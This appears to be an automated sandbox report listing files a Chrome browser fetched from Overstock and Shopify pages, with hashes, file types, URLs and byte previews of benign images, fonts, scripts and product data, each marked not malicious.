                                                                                                                                                                                    SHA-512:42EB33F079A1A7219DA56735BAD576651B6FB5B4E3DF70FDC5318C7D1A50AADE158657858DDE4325990EED869C49E7410A88DEB0CE37D235F2270C88D454A6E1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_3a5c7680-59ae-49fc-9963-e89912a9d6e3.jpg?v=1729322975&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..C.!!.9.. .....L...|D9 ....ta..6.t._..B.S.}g.V.[...%}.X..1.7.7C..X3(..aF..Yf...B6...P.D....,h.....U...F...C..Ti!...%#......|...>7/.u.H.....l......Y";2.&.Ud`o....V...q;.B.....JI. .N....:+.tr.)rl......+.t7.;.......{..Tdc..:.....A.*......#..........Y.;.`....i@.t.OF3.6.H.......LpD...n.NId.$*S;+....V.bWs.z......#..r..D.7@S 5.N.t.....B..D....._..U..h.f...d..o.jz...r.....o#.<K.w/....R,k". ..`P...?J.:. cE.:k..^S4]..x..y..V.y9 ....k...!8.......;. .....M'H..x9&.*...Lo...7l.|?h.q..N.....EXIF....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1246
                                                                                                                                                                                    Entropy (8bit):6.334975529975974
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:METCIl/X2YlXWI2PUy39TQi+C1/+Wwk71TEGq5GbP/X:2Il/XflE3JQWljwuTEGUGzX
                                                                                                                                                                                    MD5:AE0A9EF4BBCF968BC4E3A366BE5D11D5
                                                                                                                                                                                    SHA1:FAB828BF7EF4779FE16F49D06C8524C63BB2E7C3
                                                                                                                                                                                    SHA-256:582A431E9F1427BD74713812FE6D20BA69FEB9AB11CF129E66F01E56F892DFB9
                                                                                                                                                                                    SHA-512:AE38EDF045B9D70ED2330AF0454758C3652F14F2878EC7942CE499132EA143CBDEACBA7F6C46ABED851DC893945451C355A6069209EFAB7D9DFDE133CC48027E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_5c440310-b165-4f30-89c6-786279354d4e.jpg?v=1729322987&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 F........*P.P.>1..B.!..f....Y.4.eBL.`."......2.....j..5..zN..KrK.&...~4.L'AID...-k...^..Ac...x.z.U<..l.i.4L.M.....$.8......s|..y....D0/...}....~<...2U..+...?..Z.G.W..Z........D...x...A.....V}..,....>~..l....S.....@3h)7.......2~..D.G.2...`.K&m*.e.4n..d.eq..GX&r4....\.Z,E....3.......>}f..?n...Zw...u".......pf........-.3..d...4W....?O.(....5....o......3.9.4..l......!.H(.`..&).m?.z...a..........xb8..ryX..;......u!...8..{g..=...5....AZ......l.....p..A...].c.....U.s*...<T.........n#c..EGV.P...~..j........<..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):684
                                                                                                                                                                                    Entropy (8bit):4.905931501804048
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:trLJfDutv6IvMcyTH09Lf4QxcvtJETAcH9sQM8EGMxdZciHAie:t3JfDutZvI09Ln6+ljM8EGMlcHb
                                                                                                                                                                                    MD5:FFE5AF2DE8BB6BDB64C654D880C363BF
                                                                                                                                                                                    SHA1:A6F815956A7728C94CACD8C96030CED48FBBDBDF
                                                                                                                                                                                    SHA-256:867C793B860A8DBDC24FA5081B1926EE7E57B83A0AE509BFB709D55C86A69709
                                                                                                                                                                                    SHA-512:557182932715CB06BC20790385BEE87E05F5F2BDE5834FA98D4DB9029D578475B75B9303BC4DDFE490F24CD6197D63CDA3FA1E7BEF54ED14CDA2FDA415B9D649
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_35_678)">.<path d="M5.43359 4.75456L7 0.936694L8.56641 4.75456C8.66743 5.00078 8.89623 5.18459 9.17653 5.21188L13.1729 5.60093L10.14 8.39753C9.94081 8.58122 9.86015 8.85534 9.91524 9.11191L10.7955 13.2114L7.38559 11.0862C7.14905 10.9388 6.85095 10.9388 6.61441 11.0862L3.20449 13.2114L4.08476 9.11191C4.13985 8.85534 4.05919 8.58122 3.85998 8.39754L0.827052 5.60093L4.82347 5.21188C5.10376 5.18459 5.33257 5.00078 5.43359 4.75456Z" stroke="#2F3337"/>.</g>.<defs>.<clipPath id="clip0_35_678">.<rect width="14" height="14" fill="white"/>.</clipPath>.</defs>.</svg>.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, Unicode text, UTF-8 text, with very long lines (7432)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):7672
                                                                                                                                                                                    Entropy (8bit):5.101475044894889
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:j9qm2ODPRGMqUuN4ql5VhVMVYZSg+T++apH+gZtUaxwoAdIW+avLpxxjO+:pqbQchnnJZeoAdIs1O+
                                                                                                                                                                                    MD5:1D545B449977BC9428CFBC2FE8636252
                                                                                                                                                                                    SHA1:2EFC91952A7283FCB476AEB53500FBC44CC305F6
                                                                                                                                                                                    SHA-256:EE3207E4DA90DE4A87A385182B71AF838099EB532232A764FDE7A660C786C28C
                                                                                                                                                                                    SHA-512:9331416B06932E36745B7C9EE68E49B592E35C81F283579F8CE70BD83DD5EC162E1D7F800E0F7DA877C1FEBDD6B76976244BFD0F90DEDE50173193BF7F42622C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/index.2zVq00Bx.js
                                                                                                                                                                                    Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["component-Captcha.BHYA0XyW.js","app.DfgMZONA.js","assets/app.whj6cDzT.css","ShopPayCaptcha.CCES6A-V.js","assets/Captcha.BHCCpQV5.css"])))=>i.map(i=>d[i]);.import{e as t,T as n,bG as o,bH as s,bI as i,_ as d}from"./app.DfgMZONA.js";const _=new Map([["INSUFFICIENT_FUNDS","insufficient_funds"],["INVALID_PAYMENT_METHOD","cannot_verify"],["FUNDING_ERROR","processing_error"],["CANCELED_PAYPAL_BILLING_AGREEMENT","processing_error"],["TOKEN_EXPIRED","processing_error"],["INVALID_TOKEN","processing_error"],["UNILATERAL_AUTH_ERROR","processing_error"],["THIRD_PARTY_INTERNAL_ERROR","processing_error"],["AUTHORIZATION_ERROR","processing_error"],["INVALID_CURRENCY","processing_error"],["INVALID_ITEM_TOTAL","processing_error"],["UNPROCESSABLE_TRANSACTION","processing_error"],["INVOICE_ALREADY_PAID","processing_error"],["INCORRECT_NUMBER","cannot_verify"],["INCORRECT_CVC","cannot_verify"],["INCORRECT_ZIP","cannot_verify"],["INCORRECT_ADDRESS",
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 650x366, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):55497
                                                                                                                                                                                    Entropy (8bit):7.953731518792497
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:8OB2lDSGRF7gAyI4XUzfTxZ47QbkmR+SsfNq:qlDSYFiI4XUzf47xmR+Ssfw
                                                                                                                                                                                    MD5:1F56C2329806235B88253EA104BC8E41
                                                                                                                                                                                    SHA1:F743CAEFA0035E3E46DBD1CDEA21F5EDA15E1F8D
                                                                                                                                                                                    SHA-256:2E3F605EF9408498B01CD67AD25FFEC6AF492A9828E81AC3417E5A5512A53F4F
                                                                                                                                                                                    SHA-512:A0392C18CFD4A8A488E3B620116442475C2E30DC3738CA7B053FA589BE0358757E0A942D024AFE3C59199712BE1B617BAB7659A9D9CDB2F00E491DD8D3F34D68
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................n...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......n.............................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):726475
                                                                                                                                                                                    Entropy (8bit):7.871860479001658
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:Uh5wRWHGOPJgJXFkEMBv1yPJveXgllYy1KDM8uZT/UqhbJOHu1/DUbDH/32h:c5wRWm00iEANyBT+HDM8uBMqhbbGPi
                                                                                                                                                                                    MD5:B3A99DDB0EDB096B958AB1A878D8288E
                                                                                                                                                                                    SHA1:078A9C36AF0AFD2680C987A89C9FAE5E22C7A248
                                                                                                                                                                                    SHA-256:9FC31D4785EEFEFE7A79625C8B2972040204810FF1EB09B8D8B74852D0652CF4
                                                                                                                                                                                    SHA-512:E040840088692AB96193ABA6B477AE49F11D88EDB911784F1036B84711D424267BCE4C364326AE1B2781596F3967D1BEFD22BDDDEEF185863216A110B4436972
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/video/homepage/10162024-MOPS-V3850x447_DesktopA1_2024_BBB_HomefortheHolidays_BKG_V2.mp4:2f8447e3ce2bbd:3
                                                                                                                                                                                    Preview:. Hy...^..,...O.%4..K^..?.'..z.7x.erlz+.}V.g9.H.d.b...lA.zb....X...".?...|..Q........D.N..F*;_Mf#Z.;..K~..3..IJO.5..N.n.....{..I..%.......>.P...v..6..N.....9....._`p1.Ha..h.}.......`w:..(!.6..p.w..i.......&....1SK...V)0C.....{k. <....p .?..&p....).Z.T....t%21EyF{p...........[j).a......h...+;.T.tfs.8f.....`..R....3.]9^\.S....Q..'2.{.2P...-m..C...\.V..jL.]].z...V..o...{6.....'mV...%7...2.C..g...t.X.|...a..|.I.....D6.........L.#.~K.....[2.8K.m.:pl.Yh.@2..r..Jv..... .O...%....D.\8.....x|DMb]0S0..dX'.-......(.fh..&3...,._Lt].r.;.`.'.*..9.O.D.$W.D..Q...jZ.V/........Q.......".. ........X.D2i..J.....].D./..+.."......J.lh-...#.v.M....../b,..\..%....Fx..(."........G GD.^.G-.^..}.......;..|...X..T...`4.z...K^... .2i.zN6Ku.........7...S..~.m..:%.j`.....u2O.3.12S..9H.U...F......ot.FE.....g4.b.Y...&n`.D..h......_Q.......t-.."..U....8. .....M[...Fk...h..{.........4dH..>.h...'......#..3J.6Rk.)...v.O.....Y.@..(.._.1c.:.".....|.....0...e.f..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 37000, version 1.0
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):37000
                                                                                                                                                                                    Entropy (8bit):7.994901523337703
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:768:ov2nHW9SHMwHxRqTV0x4XUOnjAHjAQ7iB2BTeviUFA2NL6BHaZ9vLQ92RM:FoSHTxdx4kYQiBQ5UFWBHk9vcsM
                                                                                                                                                                                    MD5:2D6696DCA8E1E9CDB2B8CAB0258EF7CC
                                                                                                                                                                                    SHA1:9DCBADEE529B0390CB84CA62B30E53C3129D2D45
                                                                                                                                                                                    SHA-256:D8779ED671DB562EB9967AC725C153B8E193A2379FBA32F29BAE5B9E596DB1EC
                                                                                                                                                                                    SHA-512:2AE4C7F5C0CFA4034FBDED103245C62ED4571E5361B2037390447EAD6F9A53D20369E908784B4299FB1710A84A907249BF1ADCC7AD3960AEF1B03CD6411AA727
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/s/files/1/0874/3659/1420/files/belltown-bold-webfont.woff?v=1719592898
                                                                                                                                                                                    Preview:wOF2............................................?FFTM..*..*..>.`..V.<..e.....x..z..f..6.$..H. .. ..k..]?webf.[..q..y..*...O..^O..f....|.Rc3...n.....UF.g.....OL*2VI.I;6D.U.."..FR!{R!aK.&..6.I...2M..f..UR.}..C)...|..-.&...8.5.HH.....j{.F.Gd._.r...>3........^\..A......SB?.S..IW.e....v4.HP(.....q..vRTP|.....*<....~nX..f....7.M-....z.....O.D..cN..jb.t69XaG."...E..q.h8.J..?R..C@<6GU.6b..W.......y._,y..>..T..F.......H..<...K.tnSp...z;.;...f.........j.......K`.,....G..Q)m#*."./`...h..X.+..0..5..O..d2_...r.:.\..... DH.I.wW.....r9.-....@ .Ov.....o..gwO.L.V.r....o/qujCWB.O.%.......CV.TD]<.w....c.<...#..f3.IO..A........Gc..D7qBy.....D...M.........O..f0.yt.....).z.u{..\..#.#...W..a%H..,A...r...v.....T.Q0Q....6.........]...psD...../+....`..h.!e*T...r....g..W........t(..V..FJ........=r...f.(,....cC..?.C.....nz{z7Mj{_SmS......9&$.U.....W...<.b...N....{/z..NCN.9'+..z..b._z.ZLJ.....1k:%.S.).H19.G....|>.U..a.3K.E...... .$..J..J..v.N....ETU.^[.%..Y@..8.6=. ..R...}.^.\._.]....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (40076)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):40078
                                                                                                                                                                                    Entropy (8bit):5.407581148922124
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:aHdEgUzXIc0AQxsdLCvqm4E0rVpxLLlujiJHoE2t3z6uv3kzF:iKXubYWqVEgVXfllt2RSF
                                                                                                                                                                                    MD5:687C0DF9902CD1A363868B46D5CF3383
                                                                                                                                                                                    SHA1:579103D81C0B895C793B0179626F6C4E6104888C
                                                                                                                                                                                    SHA-256:515AC896C79F65D4E36AA58A6F8BB085B52EBC8946CF50D8B72B79180268A58E
                                                                                                                                                                                    SHA-512:08257CF69D14F38CD6271D1933E69DE4FF91AF42B3E5628C9BDAE75D60987D2C76E62170299D38BBA41671212FA436E7B69B1ACFF317567FB8A1AAFBE00B9DEE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/polyfills.BVWgFUkR.js
                                                                                                                                                                                    Preview:var r="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=function(r){return r&&r.Math===Math&&r},e=t("object"==typeof globalThis&&globalThis)||t("object"==typeof window&&window)||t("object"==typeof self&&self)||t("object"==typeof r&&r)||t("object"==typeof r&&r)||function(){return this}()||Function("return this")(),n={},o=function(r){try{return!!r()}catch(t){return!0}},i=!o((function(){return 7!==Object.defineProperty({},1,{get:function(){return 7}})[1]})),a=!o((function(){var r=function(){}.bind();return"function"!=typeof r||r.hasOwnProperty("prototype")})),u=a,c=Function.prototype.call,f=u?c.bind(c):function(){return c.apply(c,arguments)},s={},p={}.propertyIsEnumerable,h=Object.getOwnPropertyDescriptor,l=h&&!p.call({1:2},1);s.f=l?function(r){var t=h(this,r);return!!t&&t.enumerable}:p;var y,d,v=function(r,t){return{enumerable:!(1&r),configurable:!(2&r),writable:!(4&r),value:t}},g=a,w=Function.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (61316)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):61494
                                                                                                                                                                                    Entropy (8bit):5.509250005125198
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:uYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLIz:uYW2Pj5yO7t2ACRg8398vy
                                                                                                                                                                                    MD5:5F36A78AC6617F24097DB21A1DB94A63
                                                                                                                                                                                    SHA1:D670BEF2934D5A6E2DE1168BC5E40155E57DDBD6
                                                                                                                                                                                    SHA-256:638B4DB837CDF46E2A64B405EC81ABBF592DFF4D17EABDE70214E6332D03945A
                                                                                                                                                                                    SHA-512:21E25680534BE765BF6773C6B0E6C8B7941F2DABFA64353815AD9763629A2D030FAE0D6ABD23BFD7CCB6D1907FBB15C544D768377CC1D9742739571CFD9F6026
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));var r=t.replace(/^\s+/,"").replace(/\(eval code/g,"(").replace(/^.*?\s+/,""),n=r.match(/ (\(.+\)$)/);r=n?r.replace(n[0],""):r;var i=this.extractL
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):20829
                                                                                                                                                                                    Entropy (8bit):4.731046553999269
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:BBcBI6huuNnyWcMkgsQw6AJhDUsqOEi8XUPIu7v:BWnX0MkpwpXXy
                                                                                                                                                                                    MD5:3B3D2896650BC5151A496D479B2144F5
                                                                                                                                                                                    SHA1:7CB4CCCA8AA58BB199C87F32232EBC61F37EA1B5
                                                                                                                                                                                    SHA-256:DF0EE452B9598BA9B874E836AAC6C3A8E5A75802F4244126CD917539FF672745
                                                                                                                                                                                    SHA-512:921F9F6EF4E23753522E3714D3934C89060AEC1B90C2996EF287E91EF6D8228BE4FE5B1D29BF90CCEB5FBBA3FDD0000A64831CBC5BF463DA94965F38ABAD6984
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:..{. "results_count": 72,. "products": [ {. "id": 9403178254495,. "variant_id": 46038413705375,. "sku": "26317589-000-009",. "url": "eleanor-double-x-back-wood-swivel-bar-stool-by-inspire-q-classic-20457171?variant=46038413705375",. "variant_title": "Bar Height \/ Antique Black". },. . {. "id": 9322225008799,. "variant_id": 45617169301663,. "sku": "41638061-000-017",. "url": "cadiz-bathroom-vanity-with-composite-stone-top-without-mirror-37831689?variant=45617169301663",. "variant_title": "24in. \/ Black". },. . {. "id": 9321406627999,. "variant_id": 45615285010591,. "sku": "41523766-000-002",. "url": "63-computer-desk-with-monitor-stand-ergonomic-home-office-desks-with-drawers-file-cabinet-37701856?variant=45615285010591",. "variant_title": "Grey". },. . {. "id": 9318559219871,. "variant_id": 45603819520159,.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1352
                                                                                                                                                                                    Entropy (8bit):6.5045009086433625
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:eTCIl/X2YlXWI2PU/l4FcPYM/KhxShoaipU5XSYu3Oixev:TIl/Xflll4FcPYoKDKrBgORv
                                                                                                                                                                                    MD5:3B5CA63AA716169571B504B6D297E6DC
                                                                                                                                                                                    SHA1:CA0CF06CD17246B77E6066C3D78607C02DBCF2E5
                                                                                                                                                                                    SHA-256:5E3F37EB1E59D1A6E387FF6CE54F643D7485BA6DCF47E226BB94BF6422CA27A2
                                                                                                                                                                                    SHA-512:B71C2DC045ADF9BF680BA2B20B735CB88100B126D88F9CFB5D8F473A138BF379A13550CD021B7FDCC332A5C2896519B3710ECDDE30ECEFA8685D233AE2688676
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_95bc64fe-5bd5-4f29-8fde-4d481287589e.jpg?v=1729325189&width=80
                                                                                                                                                                                    Preview:RIFF@...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..B.!..f....Z@3.........W!h..R@.fD..:...v.X.....$m.5.h.z.j.<......J.T0..S.._.<.../.634..b"/0N....7..J.1...c..&.....[...... ...T..]2%..V..#..X)..5..X..v...a.N..G.zJl...c.W.\...84...D.y%.......t49. ....aI.h...`..I...~.*.?.<"S4.._.yqz..=......d.).p.d.f.....IK;.....9k....l.V.=l.H....0[.....*J..Z.;.....<O..BnVh.c...u...)..G....~.H....tbcL.+.,du%......<.._K..A.v.im.%.`.rX|....c.*....\x.. ?.......qL.g.t...`g.%.\.....ck....4..#...^.D!.HA%..0-..e...Z .3&....s.........(F..0...h..Sq..........<gnj.......E=
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3169)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3170
                                                                                                                                                                                    Entropy (8bit):5.350368444732153
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:cJBq2g/1tDpiGEPcrbEFc+Ob4wQJD0zXj4zKe:cvq2g95E0ceNBQuiKe
                                                                                                                                                                                    MD5:7791DE54D1ED9836A0AA38795DF4015A
                                                                                                                                                                                    SHA1:8A9BD7BFDC80B7693F87C730FE8580F8A42E03DC
                                                                                                                                                                                    SHA-256:4F2035786A00622B6E532D081403B9482EEFD1BE284BFB87E042209AD17BE700
                                                                                                                                                                                    SHA-512:CF77BA47102AD63189F631580997E67AF4A8BD9468F1A4C8E078562C4CA5B9FF795461FBCBB760A84CA03AEA049C9F3E248124C1ECF117C62D84A933CA458305
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/publishMessage.CX0yXme-.js
                                                                                                                                                                                    Preview:import{bu as _,bv as I,l as C,bw as w,bx as L,o as F,by as U,bz as b,bA as W,bB as f,bC as v,bD as R,bE as M,m as x,k as H,q as k,bF as B,y as D}from"./app.DfgMZONA.js";const E=_.Control,G=_.UnauthenticatedCheckout,V=_.UnauthenticatedCheckout,Q=[_.UnauthenticatedCheckout];function Y(){const{currentUrl:e}=I(),{type:a}=C(),t=e.searchParams.get(w),[d,o]=L([R,M]),l=F()!=null,i=U(),u=[b.DraftOrder,b.Simulated],c=W(e.search),n=c&&d||o,y=![f.ShopPayAsPaymentMethod,f.ShopPayInstallmentsAsPaymentMethod].includes(t),h=i&&y&&!u.includes(a)&&(!l||n),p=v({disabled:!h,key:"shop_pay_new_signup_login_variant",variants:Object.values(_)});return h?p||(c?d?V:E:o?G:E):E}const q=()=>{const{myshopifyDomain:e}=x(),{checkoutSessionIdentifier:a}=C(),t=H();return{exchangeSessionTokenForCookie:k(async({token:o,origin:l,analytics_trace_id:i,in_checkout_profile_preview:u})=>{const{primary:c}=B(),n=new URLSearchParams({token:o,origin:l,shopify_domain:e});a&&n.set("checkout_token",a),i&&n.set("analytics_trace_id",i)
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (18626), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):18626
                                                                                                                                                                                    Entropy (8bit):5.517606906817877
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:2uWbLyUE6D+rbQoyfD7z8h+77dCM+WiNjmuhJml:2/buUEOShmD7I2iBMl
                                                                                                                                                                                    MD5:2D408EE209FC9F33A09207CD14AD0C06
                                                                                                                                                                                    SHA1:A4B990F48AC5C28C7CF7BD50D426156390564AA4
                                                                                                                                                                                    SHA-256:4C9C0BB4D19404311ACCBCC0ADDC13775F691E0288E4175FE460AD426A0326A3
                                                                                                                                                                                    SHA-512:92B5C757E3A0FF851D79E3D91755E39B1E3A0E2CDAECCADF9D0398567FB839AB40E643BADBCD27FEA7C8AF1AF007DC13695B2544D61FC356DEAC97A75C0549D3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:"use strict";(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[681],{2675:function(e,t,n){n.r(t);var r=n(8081),a=n.n(r),l=n(3645),i=n.n(l)()(a());i.push([e.id,".cl-link {\n color: #2f3337;\n font-size: 14px;\n text-decoration: underline;\n}\n.cl-link:hover {\n color: #000;\n}\n.cl-link-inline {\n color: inherit;\n font-size: inherit;\n}\n.cl-link-icon {\n align-items: center;\n display: flex;\n text-decoration: none;\n}\n",""]),t.default=i},5454:function(e,t,n){var r=n(5318);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var a=r(n(7154)),l=r(n(6479)),i=r(n(4184)),o=n(5697),u=r(n(8661)),f=["accentFill","children","className","fill","height","stroke","title","viewBox","width"],c=function(e){e.accentFill;var t=e.children,n=e.className,r=e.fill,o=e.height,c=e.stroke,s=e.title,d=e.viewBox,h=e.width,v=(0,l.default)(e,f);return u.default.createElement("svg",(0,a.default)({className:(0,i.default)("cl-icon",n),fill:r,height:o,stroke:c,viewBox
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):586
                                                                                                                                                                                    Entropy (8bit):4.642642905026912
